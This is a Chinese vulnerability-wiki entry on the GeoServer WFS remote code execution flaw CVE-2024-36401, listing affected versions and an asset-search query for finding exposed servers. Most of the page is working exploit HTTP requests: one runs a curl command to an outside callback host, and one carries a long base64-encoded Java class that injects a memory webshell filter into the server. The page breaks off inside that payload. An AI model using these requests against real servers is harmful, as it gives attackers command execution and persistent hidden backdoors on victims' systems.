fofamini-wiki

登录白背景

源码

GeoServer wfs存在属性名表达式前台代码执行漏洞（CVE-2024-36401）

一、漏洞简介

GeoServer 是基于 Java 的软件服务器，允许用户查看和编辑地理空间数据。使用开放地理空间联盟（OGC）提出的开放标准，GeoServer 在地图创建和数据共享方面具有极大的灵活性。前台存在任意命令执行漏洞，攻击者可以直接在web应用中执行系统命令，从而获取敏感信息或者拿下shell权限。

二、影响版本

GeoServer 2.25.1， 2.24.3， 2.23.5版本及以前

三、资产测绘

hunterapp.name="GeoServer"
特征

四、漏洞复现

typeNames必须存在，我们可以在Web页面中找到当前服务器中的所有Types：

POST /geoserver/wfs HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/xml
Content-Length: 356

<wfs:GetPropertyValue service='WFS' version='2.0.0'
 xmlns:topp='http://www.openplans.org/topp'
 xmlns:fes='http://www.opengis.net/fes/2.0'
 xmlns:wfs='http://www.opengis.net/wfs/2.0'>
  <wfs:Query typeNames='sf:archsites'/>
  <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'curl 3xzj1.z9z.top')</wfs:valueReference>
</wfs:GetPropertyValue>

环境

https://zenlayer.dl.sourceforge.net/project/geoserver/GeoServer/2.25.1/geoserver-2.25.1-bin.zip?viasf=1

jMG-gui-obf-1.0.8.jar

打入内存马

POST /geoserver/wfs HTTP/1.1
Host: 127.0.0.1:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/xml
Content-Length: 356

<wfs:GetPropertyValue service='WFS' version='2.0.0'
 xmlns:topp='http://www.openplans.org/topp'
 xmlns:fes='http://www.opengis.net/fes/2.0'
 xmlns:wfs='http://www.opengis.net/wfs/2.0'>
  <wfs:Query typeNames='sf:archsites'/>
  <wfs:valueReference>eval(getEngineByName(javax.script.ScriptEngineManager.new(),'js'),'
var str="yv66vgAAADEBvgEADWphdmEvbGFuZy9zdGMHAAEBABBqYXZhL2xhbmcvT2JqZWN0BwADAQANZ2V0VXJsUGF0dGVybgEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAEQ29kZQEAAi8qCAAIAQAMZ2V0Q2xhc3NOYW1lAQApb3JnLmFwYWNoZS5sb2dnaW5nLldoaXRlQmxhY2tMaXN0QWNGaWx0ZXIIAAsBAA9nZXRCYXNlNjRTdHJpbmcBAApFeGNlcHRpb25zAQATamF2YS9pby9JT0V4Y2VwdGlvbgcADwEAEGphdmEvbGFuZy9TdHJpbmcHABEBCTRINHNJQUFBQUFBQUFBSjFXYVhNYlZSWTlUMXZMY2dlQ1FoS1VrTURBRUN4dkloc1EyWVRZSmlRRzJRbHg0dUNZbWFFalBVbWR5R3FudStYRVpvZloyWmVaWVljWllESXNBVUlSaDBCQjVRUEZGQlFmS1NpcStETHpNNlpxZ1BPNmJWbnlSb3FTM2UvMXZmZmQ1ZHpsOVJmZmYvZ0pnUFU0S1pDMDdFTEtHRFd5UlprcVdZV0NXUzZrOWhkTlYzYVhqT3poak9tNFhka2J6WklyYlExQ1lPa2hZOHhJbFF4SzdUcDRTR1pkRFVHQkN4WDFXTXFSOWxoSnVxbHArYkJBcE5Nc20rNVdnV0JUY2xBZzFHUGxwTUQ1R2JNcyt5c2pCNlc5MXpoWUlpV2VzYkpHYWRDd1RmVStSUXk1UmRNUmFNbWNzNDhkT2pSRVl3amhQSUZvenZLcEFzTk5tWG9YQi94MWp6eFNrWTdic1JEWEdiWEtqcHpOOXJYMkZBMnozS0dpV2pZRHl2WmpXVG5xbWxaWlE1d0I1QXpYRUFnTWR3czBaa3VHNDJRc0k2Y2NTbmdxVTJWcTI3Y24welBENmlCbUk5SXRXam1CVlprWnhiYk1sd2gzcXMvalVTcE1mUk1UQWhmVUNIbDZ5QXRtUzQ3Q2RJWXo0TnBFalN4QlhKZG41bkdZdlBPY09sUUUxaTZPR2hQcDFDTWxjTWxQUUVrZzhqUHdDYXhlQkZzQnpaNTI1Y3BaY2tYWEhVM3Q1R09PVDFHNzZzenNyTTg5VlBYcTRzVWkxZEFzc0diUndEUzBNcXNMeHFLaFhlQ0tjd3BCdzFVQzY4N05jUTBiNm5yU1Q3T0dUUUpMQmx3MlI1OHhPdFZNc2FKVTlkVnZqRWdkMTJCTkF3SzRWcUNoSU4yZDBpL0tkVTF6S3lZNWw2UWpqWTVHam85T0p0UFhPbWlVS2xTNzFWZDdQWk9RdGNvdTQyWVpycTdWU2pEc0FSVm5PU3M3a2dkMGRLRTdoczNvWWJPTXNuaDFiUGQxM0NpZzA3WGRoazJIaWFLT25iN1JYdFpwenVvMkhIbjFwaHRrMXBzbksrWnpmTGhieDgzSXhLaXNUMkRsQXYybVlSY3QxVEkxM0ZLSDZkNml6UmcxREJEVGJNVzJaZG4xU1p4N1RiWHcrRlRDc3crRE1lekZmbllhUStnaEV2S1kyMVBYL25VSGE5dGZ4eEFPcU5QRG5NMU53M1Zqb21PQk04bEJOZlorRmNOdS9KbzI1eFhTY0R1emxaTjVUbDZQSE1WQjl1OHNXUTBNZERtSHlneTlsOTRYMVBrQ1U3UjNhUGQySFNaV042Q0lRNVJqZkV4Q3liQmxybTlxYW0yYkp4bkRjNFpVY3VIWnBxT0VrUmdrT0I0dVdraEt3eWp6NFVpTy9xeDBITk8vTUpvT0tDeHNPREVjZ2FzSXZUNDRZekU2ZkpTejFTeVBXWWNwdXFYV1MvOHFxL055aXBTY1M5SXhqZ21sL3c0Q1dwWkhlOHVPYTdDY1o1ZERWZnd1M0syaXVZZldXZm1HR3MzTDU3R3V1dUUrM0s4dXJ3ZXFLUDdjRzB0RnZSUy9hMFFLdjJmdlY2ZThNMzFibVZhcWQxZk5iZlVuVHZ0NVZkYklQTWlCblBOYXpxNi9YYVlpSU41amhyMlo5NC9qVW1LRlV5bTNqNWhPdHIyN2EyRDdkTGZhVVR4T1BYbkxHMFVjaWo4eGRQeHkwZkVrbmxJby9vWGQ2dnZRWGNubmxiYS8rVVBNTHdzZHovaTE4K3hVRDdkWFhMUFU3bytMS0o0bkZuN0orcDY4eUVtbFdsVFpJREp6dTVLR1g4YmZWVTcrd2ZUNWhxTjRsWkdxN3hwZWQ3UFRORFh6clhMZUxIZ2ZCM3EraHNKN1pqRjVEMTlpWjQwVFE2UHNSdkVtSGQ1SDJiYXVnbFR2SitoRmI5WXRWSTVHOFE1K3dka1dBa2tJOHNuSnlhODZvWWE3dDI3MTFqQjMvQ2JpczRGdlhUd2h1SzVzUG8zem0rTnZuY0tPNXZqYnA3Q2xPZjd1S1d3N1NWWUFNVDRqbmxnamY0RHVIK0c2eEZPOEZCZFFpdW9DUVNwV0V2OXRPWXYxNlZEcldXeE1oeE9oNXZleDVReXVDK0F6bktwNTQyYmJKRzU0Qmk5N3hCMW5jRk1BNlVnaThoa2ViRTVFSnRHZjFqN0M3cUhneDlqekFXNmR4RzJuOFp0ME5HN0VzNUdQSVllQzhmekFVT2c5SEI0WUNxdm5KS3gwUTZJaE5JbEtvaUVScFV4b0tKalFLUE1SaWtQQjB6aEdRYlZOYUorb2wwbmNlUll5SFV2RUpuRnYySmNPVVRvUkp1dTMrNDhqbk5hT283R3RwZlVNL2hERWNTeEpSNlpmVGpMaUxueUtmMk1aY2ZnSzMzQU5la2oxY3djc0oySXJ5TG1JSFpkQUoxWlIrbUwwTWdXM1lTMG1jQW51eGFVNHdaUjlpc3VwNVRKOGppdndKZFpSVnpPMU5lRmJKUEVmdEhoNFRsQlRMKzdBaGRTclVVT1J1bGNTNnduY1JBc0pZbitDNzZ1d21oNTA0bUZhV2tQNzMxSmlMUzFGVkVhbXNxVjJsOUtxOEhhWDBYYkEyLzJTMW9PVS9JNGVYTWtpMHZFMWZVaXlYSzRtdndXUkgraWtwaUdnb1VWRG00YVVodlVhTm1xOHJJV0daZitEQ0dqZDNEVGdqMTY1QlBCblBFUXp2SEw5NHNEL1NRMXpIWTgvOFFIKzJ0Y2FmenJrWjNFejRYNnVsVGtJZVRsbzhST1RyLzY5MnhkL2dTZjYyK0l2c1JRa2hRVlhwdm5PZENqQjVaWDRhN1dhRXFHRjlIaFJYOFdQaHVsY3JmS3dTZkdwcU91eGdiOXJzWkV1Yi9KdzMwcE9oTkVyWlBsNXhCeXFYWkQ4TnFMOENISGFnQjE0bEJnckZNZXJHSS9qTVdaQWVOaXhjNDRRRnc4VzFaekwrUDlQRnBNUHltYXZ3OWhGczF0dGkrZkFDcDlaVlN6d0w3ek81N1F5aGZBYjFXNXU4U1RtVWRaWjA3ZFZaVDhDKzFySG9mY05BQUE9CAATAQAGPGluaXQ+AQAVKExqYXZhL2xhbmcvU3RyaW5nOylWDAAVABYKABIAFwEAAygpVgEAE2phdmEvbGFuZy9FeGNlcHRpb24HABoBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAZmaWx0ZXIBABJMamF2YS9sYW5nL09iamVjdDsBAAdjb250ZXh0AQAIY29udGV4dHMBABBMamF2YS91dGlsL0xpc3Q7AQAEdGhpcwEAD0xqYXZhL2xhbmcvc3RjOwEAFkxvY2FsVmFyaWFibGVUeXBlVGFibGUBACRMamF2YS91dGlsL0xpc3Q8TGphdmEvbGFuZy9PYmplY3Q7PjsBAA5qYXZhL3V0aWwvTGlzdAcAJwEAEmphdmEvdXRpbC9JdGVyYXRvcgcAKQEADVN0YWNrTWFwVGFibGUMABUAGQoABAAsAQAKZ2V0Q29udGV4dAEAEigpTGphdmEvdXRpbC9MaXN0OwwALgAvCgACADABAAhpdGVyYXRvcgEAFigpTGphdmEvdXRpbC9JdGVyYXRvcjsMADIAMwsAKAA0AQAHaGFzTmV4dAEAAygpWgwANgA3CwAqADgBAARuZXh0AQAUKClMamF2YS9sYW5nL09iamVjdDsMADoAOwsAKgA8AQAJZ2V0RmlsdGVyAQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsMAD4APwoAAgBAAQAJYWRkRmlsdGVyAQAnKExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvT2JqZWN0OylWDABCAEMKAAIARAEADWdldEZpbHRlck5hbWUBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEADGxhc3REb3RJbmRleAEAAUkBAAljbGFzc05hbWUBABJMamF2YS9sYW5nL1N0cmluZzsBAAEuCABMAQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoMAE4ATwoAEgBQAQALbGFzdEluZGV4T2YBABUoTGphdmEvbGFuZy9TdHJpbmc7KUkMAFIAUwoAEgBUAQAJc3Vic3RyaW5nAQAVKEkpTGphdmEvbGFuZy9TdHJpbmc7DABWAFcKABIAWAEAC19maWx0ZXJOYW1lAQABaQEAAWoBAA5zZXJ2bGV0SGFuZGxlcgEAEWZpbHRlckhvbGRlckNsYXNzAQARTGphdmEvbGFuZy9DbGFzczsBAAtjb25zdHJ1Y3RvcgEAH0xqYXZhL2xhbmcvcmVmbGVjdC9Db25zdHJ1Y3RvcjsBAAxmaWx0ZXJIb2xkZXIBAApmaWx0ZXJNYXBzAQANdG1wRmlsdGVyTWFwcwEAE1tMamF2YS9sYW5nL09iamVjdDsBAAFuAQALbWFnaWNGaWx0ZXIBAApmaWx0ZXJOYW1lAQALZmlsdGVyQ2xhc3MBAA9qYXZhL2xhbmcvQ2xhc3MHAGoBAB1qYXZhL2xhbmcvcmVmbGVjdC9Db25zdHJ1Y3RvcgcAbAcAZQwACgAGCgACAG8MAEYARwoAAgBxAQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7DABzAHQKAAQAdQEAD19zZXJ2bGV0SGFuZGxlcggAdwEABWdldEZWAQA4KExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL09iamVjdDsMAHkAegoAAgB7AQAHZ2V0TmFtZQwAfQAGCgBrAH4BAAppc0luamVjdGVkAQAnKExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvU3RyaW5nOylaDACAAIEKAAIAggEADmdldENsYXNzTG9hZGVyAQAZKClMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwwAhACFCgBrAIYBACZvcmcuZWNsaXBzZS5qZXR0eS5zZXJ2bGV0LkZpbHRlckhvbGRlcggAiAEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgcAigEACWxvYWRDbGFzcwEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsMAIwAjQoAiwCOAQAOZ2V0Q29uc3RydWN0b3IBADMoW0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9Db25zdHJ1Y3RvcjsMAJAAkQoAawCSAQALbmV3SW5zdGFuY2UBACcoW0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsMAJQAlQoAbQCWAQAHc2V0TmFtZQgAmAEADGludm9rZU1ldGhvZAEAXShMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzcztbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwwAmgCbCgACAJwBABRhZGRGaWx0ZXJXaXRoTWFwcGluZwgAngEAEWphdmEvbGFuZy9JbnRlZ2VyBwCgAQAEVFlQRQwAogBfCQChAKMMAAUABgoAAgClAQAHdmFsdWVPZgEAFihJKUxqYXZhL2xhbmcvSW50ZWdlcjsMAKcAqAoAoQCpAQAPX2ZpbHRlck1hcHBpbmdzCACrAQAXamF2YS9sYW5nL3JlZmxlY3QvQXJyYXkHAK0BAAlnZXRMZW5ndGgBABUoTGphdmEvbGFuZy9PYmplY3Q7KUkMAK8AsAoArgCxAQADZ2V0AQAnKExqYXZhL2xhbmcvT2JqZWN0O0kpTGphdmEvbGFuZy9PYmplY3Q7DACzALQKAK4AtQgAWgEAA3NldAEAKChMamF2YS9sYW5nL09iamVjdDtJTGphdmEvbGFuZy9PYmplY3Q7KVYMALgAuQoArgC6AQAVaW52YWxpZGF0ZUNoYWluc0NhY2hlCAC8DACaAHoKAAIAvgEAIGphdmEvbGFuZy9DbGFzc05vdEZvdW5kRXhjZXB0aW9uBwDAAQAramF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvblRhcmdldEV4Y2VwdGlvbgcAwgEAH2phdmEvbGFuZy9Ob1N1Y2hNZXRob2RFeGNlcHRpb24HAMQBACBqYXZhL2xhbmcvSWxsZWdhbEFjY2Vzc0V4Y2VwdGlvbgcAxgEAJGphdmEvaW8vVW5zdXBwb3J0ZWRFbmNvZGluZ0V4Y2VwdGlvbgcAyAEAEmNvbnRleHRDbGFzc0xvYWRlcgEABnRocmVhZAEAEkxqYXZhL2xhbmcvVGhyZWFkOwEAB3RocmVhZHMBABNbTGphdmEvbGFuZy9UaHJlYWQ7BwDOAQAQamF2YS9sYW5nL1RocmVhZAcA0AEAE2phdmEvdXRpbC9BcnJheUxpc3QHANIKANMALAEAEWdldEFsbFN0YWNrVHJhY2VzAQARKClMamF2YS91dGlsL01hcDsMANUA1goA0QDXAQANamF2YS91dGlsL01hcAcA2QEABmtleVNldAEAESgpTGphdmEvdXRpbC9TZXQ7DADbANwLANoA3QEADWphdmEvdXRpbC9TZXQHAN8BAAd0b0FycmF5AQAoKFtMamF2YS9sYW5nL09iamVjdDspW0xqYXZhL2xhbmcvT2JqZWN0OwwA4QDiCwDgAOMBABVnZXRDb250ZXh0Q2xhc3NMb2FkZXIBACYoTGphdmEvbGFuZy9UaHJlYWQ7KUxqYXZhL2xhbmcvT2JqZWN0OwwA5QDmCgACAOcBABNpc1dlYkFwcENsYXNzTG9hZGVyAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaDADpAOoKAAIA6wEAH2dldENvbnRleHRGcm9tV2ViQXBwQ2xhc3NMb2FkZXIMAO0APwoAAgDuAQADYWRkDADwAOoLACgA8QEAEGlzSHR0cENvbm5lY3Rpb24BABUoTGphdmEvbGFuZy9UaHJlYWQ7KVoMAPMA9AoAAgD1AQAcZ2V0Q29udGV4dEZyb21IdHRwQ29ubmVjdGlvbgwA9wDmCgACAPgBAAlTaWduYXR1cmUBACYoKUxqYXZhL3V0aWwvTGlzdDxMamF2YS9sYW5nL09iamVjdDs+OwgA5QEAC2NsYXNzTG9hZGVyAQARV2ViQXBwQ2xhc3NMb2FkZXIIAP4BAAdoYW5kbGVyAQAIX2NvbnRleHQIAQEBAA9fY29udGV4dEhhbmRsZXIIAQMBAA5odHRwQ29ubmVjdGlvbgEABWVudHJ5AQAMdGhyZWFkTG9jYWxzAQAFdGFibGUIAQcIAQgBAAV2YWx1ZQgBCwEADkh0dHBDb25uZWN0aW9uCAENAQALaHR0cENoYW5uZWwBAAdyZXF1ZXN0AQAHc2Vzc2lvbgEADnNlcnZsZXRDb250ZXh0AQAOZ2V0SHR0cENoYW5uZWwIARMBAApnZXRSZXF1ZXN0CAEVAQAKZ2V0U2Vzc2lvbggBFwEAEWdldFNlcnZsZXRDb250ZXh0CAEZAQAGdGhpcyQwCAEbAQAYSHR0cENvbm5lY3Rpb24gbm90IGZvdW5kCAEdCgAbABcBAAljbGF6ekJ5dGUBAAJbQgEAC2RlZmluZUNsYXNzAQAaTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAAVjbGF6egEAAmUxAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQABZQEAF0xqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7DAEpASoKANEBKwwA5QCFCgDRAS0MAJQAOwoAawEvDAANAAYKAAIBMQEADGRlY29kZUJhc2U2NAEAFihMamF2YS9sYW5nL1N0cmluZzspW0IMATMBNAoAAgE1AQAOZ3ppcERlY29tcHJlc3MBAAYoW0IpW0IMATcBOAoAAgE5CAEiBwEhAQARZ2V0RGVjbGFyZWRNZXRob2QBAEAoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7DAE9AT4KAGsBPwEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAcBQQEADXNldEFjY2Vzc2libGUBAAQoWilWDAFDAUQKAUIBRQEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwwBRwFICgFCAUkBAA9wcmludFN0YWNrVHJhY2UMAUsAGQoAGwFMAQAPZmlsdGVyQ2xhc3NOYW1lAQAMZGVjb2RlckNsYXNzAQAHZGVjb2RlcgEAB2lnbm9yZWQBAAliYXNlNjRTdHIBABRMamF2YS9sYW5nL0NsYXNzPCo+OwEAFnN1bi5taXNjLkJBU0U2NERlY29kZXIIAVQBAAdmb3JOYW1lDAFWAI0KAGsBVwEADGRlY29kZUJ1ZmZlcggBWQEACWdldE1ldGhvZAwBWwE+CgBrAVwBABBqYXZhLnV0aWwuQmFzZTY0CAFeAQAKZ2V0RGVjb2RlcggBYAEABmRlY29kZQgBYgEADmNvbXByZXNzZWREYXRhAQADb3V0AQAfTGphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtOwEAAmluAQAeTGphdmEvaW8vQnl0ZUFycmF5SW5wdXRTdHJlYW07AQAGdW5nemlwAQAfTGphdmEvdXRpbC96aXAvR1pJUElucHV0U3RyZWFtOwEABmJ1ZmZlcgEAHWphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtBwFsAQAcamF2YS9pby9CeXRlQXJyYXlJbnB1dFN0cmVhbQcBbgEAHWphdmEvdXRpbC96aXAvR1pJUElucHV0U3RyZWFtBwFwCgFtACwBAAUoW0IpVgwAFQFzCgFvAXQBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYMABUBdgoBcQF3AQAEcmVhZAEABShbQilJDAF5AXoKAXEBewEABXdyaXRlAQAHKFtCSUkpVgwBfQF+CgFtAX8BAAt0b0J5dGVBcnJheQEABCgpW0IMAYEBggoBbQGDAQADb2JqAQAJZmllbGROYW1lAQAFZmllbGQBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAEZ2V0RgEAPyhMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwwBiQGKCgACAYsBABdqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZAcBjQoBjgFFDACzAD8KAY4BkAEAHmphdmEvbGFuZy9Ob1N1Y2hGaWVsZEV4Y2VwdGlvbgcBkgEAIExqYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb247AQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwwBlQGWCgBrAZcBAA1nZXRTdXBlcmNsYXNzDAGZAHQKAGsBmgoBkwAXAQAMdGFyZ2V0T2JqZWN0AQAKbWV0aG9kTmFtZQEAB21ldGhvZHMBABtbTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBACFMamF2YS9sYW5nL05vU3VjaE1ldGhvZEV4Y2VwdGlvbjsBACJMamF2YS9sYW5nL0lsbGVnYWxBY2Nlc3NFeGNlcHRpb247AQAKcGFyYW1DbGF6egEAEltMamF2YS9sYW5nL0NsYXNzOwEABXBhcmFtAQAGbWV0aG9kAQAJdGVtcENsYXNzBwGgAQASZ2V0RGVjbGFyZWRNZXRob2RzAQAdKClbTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsMAakBqgoAawGrCgFCAH4BAAZlcXVhbHMMAa4A6goAEgGvAQARZ2V0UGFyYW1ldGVyVHlwZXMBABQoKVtMamF2YS9sYW5nL0NsYXNzOwwBsQGyCgFCAbMKAMUAFwEAGmphdmEvbGFuZy9SdW50aW1lRXhjZXB0aW9uBwG2AQAKZ2V0TWVzc2FnZQwBuAAGCgDHAbkKAbcAFwEACDxjbGluaXQ+CgACACwAIQACAAQAAAAAABUAAQAFAAYAAQAHAAAADwABAAEAAAAD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